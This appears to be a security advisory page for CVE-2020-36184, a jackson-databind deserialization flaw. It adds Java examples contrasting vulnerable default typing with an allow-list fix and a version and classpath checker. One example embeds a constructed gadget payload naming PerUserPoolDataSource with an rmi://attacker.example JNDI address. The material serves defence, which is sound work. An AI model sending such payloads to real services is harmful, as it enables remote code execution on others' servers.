CVE-2020-36184
Deserialization vulnerability in jackson-databind (Maven)
What is CVE-2020-36184 About?
This is a deserialization vulnerability in FasterXML jackson-databind versions 2.x before 2.9.10.8. It arises from mishandling the interaction between serialization gadgets and typing, specifically involving the class `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource` (Tomcat's repackaged Commons DBCP2). Successful exploitation can lead to remote code execution. It requires that the attacker control the data being deserialized and that the application let the input choose the target class (polymorphic or "default" typing).
Affected Software
com.fasterxml.jackson.core:jackson-databind (Maven), versions 2.x before 2.9.10.8.
Technical Details
When jackson-databind is configured for polymorphic deserialization (for example with default typing enabled), the JSON input itself names the class to instantiate. An attacker can name org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource as that type. Jackson instantiates the class and applies the attacker-supplied properties through its setters; the data source resolves its backing connection pool by JNDI name, so those properties can point it at an attacker-controlled naming service. When that lookup runs, the JNDI reference it returns can cause the JVM to load and execute attacker-supplied code on the target system.
What is the Impact of CVE-2020-36184?
Successful exploitation may allow attackers to execute arbitrary code on the server, potentially leading to a full compromise of the underlying system, data exfiltration, or denial of service.
What is the Exploitability of CVE-2020-36184?
Exploitation of this jackson-databind deserialization vulnerability requires the attacker to submit a crafted payload (JSON, or another format parsed through jackson-databind) to an application endpoint that deserializes it with the vulnerable library. The complexity is moderate: the attacker needs to know the PerUserPoolDataSource gadget and how Jackson's polymorphic deserialization resolves type names. No authentication is needed beyond whatever protects the endpoint, and the attack is carried out remotely. The prerequisites are a vulnerable jackson-databind version, the PerUserPoolDataSource class on the application's classpath, and an application that processes untrusted input with polymorphic typing enabled and no allow-list of permitted classes. One further caveat: on JDKs where remote codebase loading for RMI and LDAP JNDI references is disabled (the default since 8u121 and 8u191 respectively), the JNDI step cannot fetch a class from the attacker's server and instead needs a gadget already present on the local classpath.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| Al1ex | Link | CVE-2020-36184 && Jackson-databind RCE |
What are the Available Fixes for CVE-2020-36184?
About the Fix from Resolved Security
The patch extends the set of blocked classes in Jackson's SubTypeValidator to include org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource and SharedPoolDataSource, so default typing refuses to instantiate either of them. This stops exploitation of CVE-2020-36184 by rejecting payloads whose type id names these gadget classes. Note that this is a deny-list of known gadgets: applications that enable default typing on untrusted input remain exposed to any gadget class not yet on the list, so the durable fix is to restrict polymorphic deserialization to an explicit allow-list of application types.
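The configuration that the Technical Details section describes, beside the allow-list configuration that the fix section recommends, as an added example that is not code from the advisory or from the jackson-databind project. The Command and Echo types, the payload strings and the host attacker.example are constructed for the demonstration; the allow-list API (BasicPolymorphicTypeValidator, activateDefaultTyping) assumes jackson-databind 2.10 or later on the classpath.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class PolymorphicTypingDemo {

    /** The application's own polymorphic hierarchy (hypothetical). */
    public interface Command {
        String describe();
    }

    public static class Echo implements Command {
        public String text;
        @Override public String describe() { return "echo " + text; }
    }

    /** Constructed attacker input: the type id names the dbcp2 gadget class from the advisory. */
    public static final String GADGET_JSON =
        "[\"org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource\","
      + "{\"dataSourceName\":\"rmi://attacker.example:1099/x\"}]";

    /** Constructed legitimate input naming one of the application's own types. */
    public static final String LEGIT_JSON =
        "[\"" + Echo.class.getName() + "\",{\"text\":\"hello\"}]";

    /**
     * Vulnerable configuration: global default typing with no validator, so the
     * JSON picks the class to instantiate. This is the 2.9-era API. From 2.9.10.8
     * a deny-list blocks known gadgets such as PerUserPoolDataSource, but any
     * class not on that list is still instantiated from attacker input.
     */
    @SuppressWarnings("deprecation")
    public static ObjectMapper vulnerableMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(); // DefaultTyping.OBJECT_AND_NON_CONCRETE
        return m;
    }

    /**
     * Hardened configuration: default typing stays on, but a type id is accepted
     * only if it resolves to a subtype of Command. Everything else, the dbcp2
     * gadget included, is refused with InvalidTypeIdException.
     */
    public static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType(Command.class)
            .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    /** Parse a Command with the hardened mapper; non-Command type ids are rejected. */
    public static Command parseCommand(String json) throws java.io.IOException {
        return hardenedMapper().readValue(json, Command.class);
    }

    public static void main(String[] args) throws Exception {
        Command c = parseCommand(LEGIT_JSON);
        System.out.println("legit payload  -> " + c.describe());

        try {
            // Object.class is the base type the classic default-typing payloads target.
            hardenedMapper().readValue(GADGET_JSON, Object.class);
            System.out.println("gadget payload -> instantiated (not expected)");
        } catch (InvalidTypeIdException e) {
            System.out.println("gadget payload -> rejected: " + e.getMessage());
        }
    }
}
```

The hardened mapper rejects the gadget payload whether or not Tomcat's dbcp2 classes are present, because the decision is made on the type id rather than on what the class does once loaded. On a 2.9.x line that cannot move to 2.10, the equivalent is to leave default typing off entirely and use @JsonTypeInfo(use = JsonTypeInfo.Id.NAME) with @JsonSubTypes on the application's own base types, which also amounts to an allow-list.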
Available Upgrade Options
- com.fasterxml.jackson.core:jackson-databind
- >2.0.0, <2.9.10.8 → Upgrade to 2.9.10.8
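Two of the prerequisites listed under exploitability (a vulnerable jackson-databind version and the gadget class on the classpath) and the upgrade range above can be checked mechanically. The following is an added example, not part of the advisory: it extracts jackson-databind versions from `mvn dependency:tree` output and flags those in the 2.x before 2.9.10.8 range, and it probes the running JVM for the gadget class. The dependency-tree text is constructed for the example, not taken from a real build.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class JacksonDatabindCheck {

    static final String GADGET_CLASS =
        "org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource";
    static final int[] FIXED = {2, 9, 10, 8};

    /** Constructed sample of `mvn dependency:tree` output (hypothetical build). */
    static final String SAMPLE_TREE = String.join("\n",
        "[INFO] +- com.fasterxml.jackson.core:jackson-databind:jar:2.9.10.7:compile",
        "[INFO] |  \\- com.fasterxml.jackson.core:jackson-core:jar:2.9.10:compile",
        "[INFO] +- com.fasterxml.jackson.core:jackson-databind:jar:2.9.10.8:compile",
        "[INFO] \\- com.fasterxml.jackson.core:jackson-databind:jar:2.12.3:test");

    /** Matches the jackson-databind artifact and captures its version string. */
    static final Pattern DATABIND = Pattern.compile(
        "com\\.fasterxml\\.jackson\\.core:jackson-databind:jar:([0-9.]+[^:]*):");

    /** Leading numeric segments: "2.9.10.8-SNAPSHOT" -> [2, 9, 10, 8]. Qualifiers are ignored. */
    static int[] segments(String version) {
        Matcher m = Pattern.compile("^(\\d+(?:\\.\\d+)*)").matcher(version);
        if (!m.find()) throw new IllegalArgumentException("not a version: " + version);
        String[] parts = m.group(1).split("\\.");
        int[] out = new int[parts.length];
        for (int i = 0; i < parts.length; i++) out[i] = Integer.parseInt(parts[i]);
        return out;
    }

    /** Segment-wise comparison; missing trailing segments count as 0 (2.9.10 == 2.9.10.0). */
    static int compare(int[] a, int[] b) {
        int n = Math.max(a.length, b.length);
        for (int i = 0; i < n; i++) {
            int x = i < a.length ? a[i] : 0;
            int y = i < b.length ? b[i] : 0;
            if (x != y) return Integer.compare(x, y);
        }
        return 0;
    }

    /** The advisory's range: major version 2 and older than 2.9.10.8. */
    public static boolean isVulnerable(String version) {
        int[] v = segments(version);
        return v[0] == 2 && compare(v, FIXED) < 0;
    }

    /** Every distinct vulnerable jackson-databind version named in dependency:tree output. */
    public static List<String> vulnerableVersions(String tree) {
        List<String> hits = new ArrayList<>();
        Matcher m = DATABIND.matcher(tree);
        while (m.find()) {
            String v = m.group(1);
            if (isVulnerable(v) && !hits.contains(v)) hits.add(v);
        }
        return hits;
    }

    /** True when the gadget class resolves on this JVM's classpath; initialize=false avoids running its static init. */
    public static boolean gadgetOnClasspath() {
        try {
            Class.forName(GADGET_CLASS, false, JacksonDatabindCheck.class.getClassLoader());
            return true;
        } catch (ClassNotFoundException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        // For SAMPLE_TREE this reports [2.9.10.7]; 2.9.10.8 and 2.12.3 are outside the range.
        System.out.println("vulnerable jackson-databind versions: " + vulnerableVersions(SAMPLE_TREE));
        System.out.println("gadget class on classpath: " + gadgetOnClasspath());
    }
}
```

A version outside the range only removes this particular gadget from the deny-list's blind spot; the classpath probe matters because an application that enables default typing is exposed to whichever gadget classes its dependencies happen to ship, so the real remediation is the allow-list configuration rather than the version bump alone.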
Additional Resources
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://security.netapp.com/advisory/ntap-20210205-0005
- https://www.oracle.com/security-alerts/cpuApr2021.html
- https://github.com/FasterXML/jackson-databind/issues/2998
What are Similar Vulnerabilities to CVE-2020-36184?
Similar Vulnerabilities: CVE-2020-24750, CVE-2020-36182, CVE-2020-24616, CVE-2019-12814, CVE-2019-14540
